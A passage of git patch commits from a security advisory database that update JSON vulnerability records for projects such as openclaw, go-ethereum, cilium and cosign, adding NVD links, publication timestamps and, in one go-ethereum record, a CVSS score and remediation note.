+++ b/advisories/github-reviewed/2026/02/GHSA-g6q9-8fvw-f7rf/GHSA-g6q9-8fvw-f7rf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g6q9-8fvw-f7rf", - "modified": "2026-02-17T21:42:15Z", + "modified": "2026-02-20T16:44:39Z", "published": "2026-02-17T21:42:15Z", "aliases": [ "CVE-2026-26322" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g6q9-8fvw-f7rf" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26322" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/c5406e1d2434be2ef6eb4d26d8f1798d718713f4" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:42:15Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-h3f9-mjwj-w476/GHSA-h3f9-mjwj-w476.json b/advisories/github-reviewed/2026/02/GHSA-h3f9-mjwj-w476/GHSA-h3f9-mjwj-w476.json index fefb15ed84ef3..93dd5e895bd1d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-h3f9-mjwj-w476/GHSA-h3f9-mjwj-w476.json +++ b/advisories/github-reviewed/2026/02/GHSA-h3f9-mjwj-w476/GHSA-h3f9-mjwj-w476.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h3f9-mjwj-w476", - "modified": "2026-02-17T21:42:49Z", + "modified": "2026-02-20T16:44:54Z", "published": "2026-02-17T21:42:49Z", "aliases": [ "CVE-2026-26325" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h3f9-mjwj-w476" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26325" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/cb3290fca32593956638f161d9776266b90ab891" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:42:49Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:25Z" } } \ No newline at end of file 
diff --git a/advisories/github-reviewed/2026/02/GHSA-jrvc-8ff5-2f9f/GHSA-jrvc-8ff5-2f9f.json b/advisories/github-reviewed/2026/02/GHSA-jrvc-8ff5-2f9f/GHSA-jrvc-8ff5-2f9f.json index 231805f7ddbb7..2688ffa557d26 100644 --- a/advisories/github-reviewed/2026/02/GHSA-jrvc-8ff5-2f9f/GHSA-jrvc-8ff5-2f9f.json +++ b/advisories/github-reviewed/2026/02/GHSA-jrvc-8ff5-2f9f/GHSA-jrvc-8ff5-2f9f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jrvc-8ff5-2f9f", - "modified": "2026-02-17T21:42:40Z", + "modified": "2026-02-20T16:44:46Z", "published": "2026-02-17T21:42:40Z", "aliases": [ "CVE-2026-26324" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jrvc-8ff5-2f9f" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26324" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/c0c0e0f9aecb913e738742f73e091f2f72d39a19" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:42:40Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-pchc-86f6-8758/GHSA-pchc-86f6-8758.json b/advisories/github-reviewed/2026/02/GHSA-pchc-86f6-8758/GHSA-pchc-86f6-8758.json index be7cb922e9814..72a7b9e871944 100644 --- a/advisories/github-reviewed/2026/02/GHSA-pchc-86f6-8758/GHSA-pchc-86f6-8758.json +++ b/advisories/github-reviewed/2026/02/GHSA-pchc-86f6-8758/GHSA-pchc-86f6-8758.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pchc-86f6-8758", - "modified": "2026-02-17T21:33:51Z", + "modified": "2026-02-20T16:44:12Z", "published": "2026-02-17T21:33:51Z", "aliases": [ "CVE-2026-26316" 
@@ -59,6 +59,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-pchc-86f6-8758" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26316" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/743f4b28495cdeb0d5bf76f6ebf4af01f6a02e5a" @@ -74,6 +78,10 @@ { "type": "WEB", "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.12" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.13" } ], "database_specific": { @@ -83,6 +91,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:33:51Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T22:16:47Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-wfqv-66vq-46rm/GHSA-wfqv-66vq-46rm.json b/advisories/github-reviewed/2026/02/GHSA-wfqv-66vq-46rm/GHSA-wfqv-66vq-46rm.json index e2adc95e0fa4e..9f5ca3cd7d3fe 100644 --- a/advisories/github-reviewed/2026/02/GHSA-wfqv-66vq-46rm/GHSA-wfqv-66vq-46rm.json +++ b/advisories/github-reviewed/2026/02/GHSA-wfqv-66vq-46rm/GHSA-wfqv-66vq-46rm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wfqv-66vq-46rm", - "modified": "2026-02-19T22:09:12Z", + "modified": "2026-02-20T16:43:55Z", "published": "2026-02-19T22:09:12Z", "aliases": [ "CVE-2026-24122" @@ -43,9 +43,21 @@ "type": "WEB", "url": "https://github.com/sigstore/cosign/security/advisories/GHSA-wfqv-66vq-46rm" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24122" + }, + { + "type": "WEB", + "url": "https://github.com/sigstore/cosign/commit/3c9a7363f563db76d78e2de2cabd945450f3781e" + }, { "type": "PACKAGE", "url": "https://github.com/sigstore/cosign" + }, + { + "type": "WEB", + "url": "https://github.com/sigstore/cosign/releases/tag/v3.0.5" } ], "database_specific": { 
@@ -55,6 +67,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2026-02-19T22:09:12Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:24Z" } } \ No newline at end of file From da86798a9812e7ef1f1cd1b3686858147f8db53e Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 16:47:20 +0000 Subject: [PATCH 08/77] Publish Advisories GHSA-2gjw-fg97-vg3r GHSA-2qj5-gwg2-xwc4 GHSA-3fqr-4cg8-h96q GHSA-5r23-prx4-mqg3 GHSA-8mh7-phf8-xgfm GHSA-cv7m-c9jx-vg7q GHSA-fw7p-63qq-7hpr GHSA-g34w-4xqq-h79m GHSA-m6j8-rg6r-7mv8 GHSA-m7x8-2w3w-pr42 GHSA-pv58-549p-qh99 GHSA-wgm6-9rvv-3438 GHSA-xwjm-j929-xq7c --- .../GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json | 8 ++++++-- .../GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json | 8 ++++++-- .../GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json | 8 ++++++-- .../GHSA-5r23-prx4-mqg3/GHSA-5r23-prx4-mqg3.json | 8 ++++++-- .../GHSA-8mh7-phf8-xgfm/GHSA-8mh7-phf8-xgfm.json | 8 ++++++-- .../GHSA-cv7m-c9jx-vg7q/GHSA-cv7m-c9jx-vg7q.json | 8 ++++++-- .../GHSA-fw7p-63qq-7hpr/GHSA-fw7p-63qq-7hpr.json | 8 ++++++-- .../GHSA-g34w-4xqq-h79m/GHSA-g34w-4xqq-h79m.json | 8 ++++++-- .../GHSA-m6j8-rg6r-7mv8/GHSA-m6j8-rg6r-7mv8.json | 15 ++++++++++++--- .../GHSA-m7x8-2w3w-pr42/GHSA-m7x8-2w3w-pr42.json | 8 ++++++-- .../GHSA-pv58-549p-qh99/GHSA-pv58-549p-qh99.json | 8 ++++++-- .../GHSA-wgm6-9rvv-3438/GHSA-wgm6-9rvv-3438.json | 8 ++++++-- .../GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json | 8 ++++++-- 13 files changed, 84 insertions(+), 27 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json b/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json index b4beb8b27aa87..8bb5175975be1 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json +++ b/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2gjw-fg97-vg3r", - "modified": "2026-02-18T22:35:15Z", + "modified": "2026-02-20T16:46:27Z", "published": "2026-02-18T22:35:15Z", "aliases": [ "CVE-2026-26314" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/ethereum/go-ethereum/security/advisories/GHSA-2gjw-fg97-vg3r" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26314" + }, { "type": "WEB", "url": "https://github.com/ethereum/go-ethereum/commit/895a8597cb16c02203e38707ed2d1da5c500fe60" @@ -63,6 +67,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:35:15Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T22:16:46Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json b/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json index 1138be2d2fb6c..a0a0c5b5f1d21 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json +++ b/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2qj5-gwg2-xwc4", - "modified": "2026-02-18T22:42:29Z", + "modified": "2026-02-20T16:46:56Z", "published": "2026-02-18T22:42:29Z", "aliases": [ "CVE-2026-27001" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2qj5-gwg2-xwc4" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27001" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/6254e96acf16e70ceccc8f9b2abecee44d606f79" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:42:29Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:16Z" } } \ No newline at end of file 
diff --git a/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json b/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json index 54ea267f43b37..6dbb90ce41f2d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json +++ b/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3fqr-4cg8-h96q", - "modified": "2026-02-18T00:53:59Z", + "modified": "2026-02-20T16:46:03Z", "published": "2026-02-18T00:53:59Z", "aliases": [ "CVE-2026-26317" @@ -59,6 +59,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3fqr-4cg8-h96q" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26317" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/b566b09f81e2b704bf9398d8d97d5f7a90aa94c3" @@ -79,6 +83,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:53:59Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T22:16:47Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-5r23-prx4-mqg3/GHSA-5r23-prx4-mqg3.json b/advisories/github-reviewed/2026/02/GHSA-5r23-prx4-mqg3/GHSA-5r23-prx4-mqg3.json index c9edc47a779d1..9629a08520c74 100644 --- a/advisories/github-reviewed/2026/02/GHSA-5r23-prx4-mqg3/GHSA-5r23-prx4-mqg3.json +++ b/advisories/github-reviewed/2026/02/GHSA-5r23-prx4-mqg3/GHSA-5r23-prx4-mqg3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5r23-prx4-mqg3", - "modified": "2026-02-19T19:39:01Z", + "modified": "2026-02-20T16:46:49Z", "published": "2026-02-19T19:39:01Z", "aliases": [ "CVE-2026-26963" 
@@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/cilium/cilium/security/advisories/GHSA-5r23-prx4-mqg3" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26963" + }, { "type": "WEB", "url": "https://github.com/cilium/cilium/pull/42892" @@ -67,6 +71,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T19:39:01Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:16Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-8mh7-phf8-xgfm/GHSA-8mh7-phf8-xgfm.json b/advisories/github-reviewed/2026/02/GHSA-8mh7-phf8-xgfm/GHSA-8mh7-phf8-xgfm.json index 51279fa50f1f1..3eaf17ceb5529 100644 --- a/advisories/github-reviewed/2026/02/GHSA-8mh7-phf8-xgfm/GHSA-8mh7-phf8-xgfm.json +++ b/advisories/github-reviewed/2026/02/GHSA-8mh7-phf8-xgfm/GHSA-8mh7-phf8-xgfm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8mh7-phf8-xgfm", - "modified": "2026-02-17T21:43:41Z", + "modified": "2026-02-20T16:45:23Z", "published": "2026-02-17T21:43:41Z", "aliases": [ "CVE-2026-26326" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8mh7-phf8-xgfm" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26326" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/d3428053d95eefbe10ecf04f92218ffcba55ae5a" @@ -64,6 +68,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:43:41Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-cv7m-c9jx-vg7q/GHSA-cv7m-c9jx-vg7q.json b/advisories/github-reviewed/2026/02/GHSA-cv7m-c9jx-vg7q/GHSA-cv7m-c9jx-vg7q.json index 13049c6558246..6bff99ad0f0ad 100644 --- a/advisories/github-reviewed/2026/02/GHSA-cv7m-c9jx-vg7q/GHSA-cv7m-c9jx-vg7q.json 
+++ b/advisories/github-reviewed/2026/02/GHSA-cv7m-c9jx-vg7q/GHSA-cv7m-c9jx-vg7q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cv7m-c9jx-vg7q", - "modified": "2026-02-18T00:46:49Z", + "modified": "2026-02-20T16:45:47Z", "published": "2026-02-18T00:46:49Z", "aliases": [ "CVE-2026-26329" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cv7m-c9jx-vg7q" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26329" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/3aa94afcfd12104c683c9cad81faf434d0dadf87" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:46:49Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:15Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-fw7p-63qq-7hpr/GHSA-fw7p-63qq-7hpr.json b/advisories/github-reviewed/2026/02/GHSA-fw7p-63qq-7hpr/GHSA-fw7p-63qq-7hpr.json index 20ef894fb6f47..9b55e69db24ff 100644 --- a/advisories/github-reviewed/2026/02/GHSA-fw7p-63qq-7hpr/GHSA-fw7p-63qq-7hpr.json +++ b/advisories/github-reviewed/2026/02/GHSA-fw7p-63qq-7hpr/GHSA-fw7p-63qq-7hpr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fw7p-63qq-7hpr", - "modified": "2026-02-18T22:37:15Z", + "modified": "2026-02-20T16:46:42Z", "published": "2026-02-18T22:37:15Z", "aliases": [ "CVE-2026-26958" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/FiloSottile/edwards25519/security/advisories/GHSA-fw7p-63qq-7hpr" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26958" + }, { "type": "WEB", "url": "https://github.com/FiloSottile/edwards25519/commit/d1c650afb95fad0742b98d95f2eb2cf031393abb" @@ -60,6 +64,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:37:15Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:26Z" } } \ No newline at end of file 
diff --git a/advisories/github-reviewed/2026/02/GHSA-g34w-4xqq-h79m/GHSA-g34w-4xqq-h79m.json b/advisories/github-reviewed/2026/02/GHSA-g34w-4xqq-h79m/GHSA-g34w-4xqq-h79m.json index baed442e321ac..c416679c5952b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-g34w-4xqq-h79m/GHSA-g34w-4xqq-h79m.json +++ b/advisories/github-reviewed/2026/02/GHSA-g34w-4xqq-h79m/GHSA-g34w-4xqq-h79m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g34w-4xqq-h79m", - "modified": "2026-02-18T00:43:54Z", + "modified": "2026-02-20T16:45:39Z", "published": "2026-02-18T00:43:54Z", "aliases": [ "CVE-2026-26328" @@ -59,6 +59,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g34w-4xqq-h79m" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26328" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/872079d42fe105ece2900a1dd6ab321b92da2d59" @@ -80,6 +84,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:43:54Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:15Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-m6j8-rg6r-7mv8/GHSA-m6j8-rg6r-7mv8.json b/advisories/github-reviewed/2026/02/GHSA-m6j8-rg6r-7mv8/GHSA-m6j8-rg6r-7mv8.json index 3a060cb15622b..dd65b4804cdf6 100644 --- a/advisories/github-reviewed/2026/02/GHSA-m6j8-rg6r-7mv8/GHSA-m6j8-rg6r-7mv8.json +++ b/advisories/github-reviewed/2026/02/GHSA-m6j8-rg6r-7mv8/GHSA-m6j8-rg6r-7mv8.json 
@@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-m6j8-rg6r-7mv8", - "modified": "2026-02-18T22:36:06Z", + "modified": "2026-02-20T16:46:34Z", "published": "2026-02-18T22:36:06Z", "aliases": [ "CVE-2026-26315" ], "summary": "Go Ethereum Improperly Validates the ECIES Public Key in RLPx Handshake", "details": "### Impact\n\nThrough a flaw in the ECIES cryptography implementation, an attacker may be able to extract bits of the p2p node key.\n\n### Patches\n\nThe issue is resolved in the v1.16.9 and v1.17.0 releases of Geth. We recommend rotating the node key after applying the upgrade, which can be done by removing the file `/geth/nodekey` before starting Geth.\n\n### Credit\n\nThe issue was reported as a public pull request to go-ethereum by @fengjian.", - "severity": [], + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], "affected": [ { "package": { @@ -38,6 +43,10 @@ "type": "WEB", "url": "https://github.com/ethereum/go-ethereum/security/advisories/GHSA-m6j8-rg6r-7mv8" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26315" + }, { "type": "WEB", "url": "https://github.com/ethereum/go-ethereum/pull/33669" @@ -62,6 +71,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:36:06Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T22:16:46Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-m7x8-2w3w-pr42/GHSA-m7x8-2w3w-pr42.json b/advisories/github-reviewed/2026/02/GHSA-m7x8-2w3w-pr42/GHSA-m7x8-2w3w-pr42.json index c9d8eb065fc3b..02165d997610b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-m7x8-2w3w-pr42/GHSA-m7x8-2w3w-pr42.json +++ b/advisories/github-reviewed/2026/02/GHSA-m7x8-2w3w-pr42/GHSA-m7x8-2w3w-pr42.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m7x8-2w3w-pr42", - "modified": "2026-02-18T00:46:55Z", + "modified": "2026-02-20T16:45:55Z", "published": "2026-02-18T00:46:54Z", "aliases": [ "CVE-2026-26323" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m7x8-2w3w-pr42" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26323" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/a429380e337152746031d290432a4b93aa553d55" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:46:54Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-pv58-549p-qh99/GHSA-pv58-549p-qh99.json b/advisories/github-reviewed/2026/02/GHSA-pv58-549p-qh99/GHSA-pv58-549p-qh99.json index 2cd220d567f1d..b569bd2a56b4b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-pv58-549p-qh99/GHSA-pv58-549p-qh99.json +++ b/advisories/github-reviewed/2026/02/GHSA-pv58-549p-qh99/GHSA-pv58-549p-qh99.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pv58-549p-qh99", - "modified": "2026-02-19T22:56:54Z", + "modified": "2026-02-20T16:45:30Z", "published": "2026-02-18T00:33:35Z", "aliases": [ "CVE-2026-26327" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-pv58-549p-qh99" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26327" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/d583782ee322a6faa1fe87ae52455e0d349de586" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:33:35Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:26Z" } } \ No newline at end of file 
diff --git a/advisories/github-reviewed/2026/02/GHSA-wgm6-9rvv-3438/GHSA-wgm6-9rvv-3438.json b/advisories/github-reviewed/2026/02/GHSA-wgm6-9rvv-3438/GHSA-wgm6-9rvv-3438.json index 796e7ea500aaa..43e61a3cc9b0d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-wgm6-9rvv-3438/GHSA-wgm6-9rvv-3438.json +++ b/advisories/github-reviewed/2026/02/GHSA-wgm6-9rvv-3438/GHSA-wgm6-9rvv-3438.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wgm6-9rvv-3438", - "modified": "2026-02-18T00:56:30Z", + "modified": "2026-02-20T16:46:10Z", "published": "2026-02-18T00:56:30Z", "aliases": [ "CVE-2026-26957" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wgm6-9rvv-3438" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26957" + }, { "type": "WEB", "url": "https://github.com/abhinavxd/libredesk/commit/727213631ce6a36bcb06f50ce542155e78f51316" @@ -57,6 +61,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:56:30Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:15Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json b/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json index cbafa16a3039d..e53b4e6c27245 100644 --- a/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json +++ b/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xwjm-j929-xq7c", - "modified": "2026-02-18T17:37:53Z", + "modified": "2026-02-20T16:46:20Z", "published": "2026-02-18T17:37:52Z", "aliases": [ "CVE-2026-26972" 
@@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xwjm-j929-xq7c" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26972" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/7f0489e4731c8d965d78d6eac4a60312e46a9426" @@ -63,6 +67,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-18T17:37:52Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:16Z" } } \ No newline at end of file From 4f3178c823a59893cf56bed5c4043b516245a683 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 16:49:25 +0000 Subject: [PATCH 09/77] Publish Advisories GHSA-37gc-85xm-2ww6 GHSA-6hf3-mhgc-cm65 GHSA-83g3-92jg-28cx GHSA-chf7-jq6g-qrwv GHSA-fqx6-693c-f55g GHSA-gqx7-99jw-6fpr GHSA-h7f7-89mm-pqh6 GHSA-w235-x559-36mg GHSA-w52v-v783-gw97 GHSA-w7h5-55jg-cq2f GHSA-xxvh-5hwj-42pp --- .../02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json | 8 ++++++-- .../02/GHSA-6hf3-mhgc-cm65/GHSA-6hf3-mhgc-cm65.json | 8 ++++++-- .../02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json | 8 ++++++-- .../02/GHSA-chf7-jq6g-qrwv/GHSA-chf7-jq6g-qrwv.json | 8 ++++++-- .../02/GHSA-fqx6-693c-f55g/GHSA-fqx6-693c-f55g.json | 8 ++++++-- .../02/GHSA-gqx7-99jw-6fpr/GHSA-gqx7-99jw-6fpr.json | 8 ++++++-- .../02/GHSA-h7f7-89mm-pqh6/GHSA-h7f7-89mm-pqh6.json | 8 ++++++-- .../02/GHSA-w235-x559-36mg/GHSA-w235-x559-36mg.json | 8 ++++++-- .../02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json | 8 ++++++-- .../02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json | 12 ++++++++++-- .../02/GHSA-xxvh-5hwj-42pp/GHSA-xxvh-5hwj-42pp.json | 8 ++++++-- 11 files changed, 70 insertions(+), 22 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json b/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json index 474de7cd75b43..15ac4ab2878ea 100644 
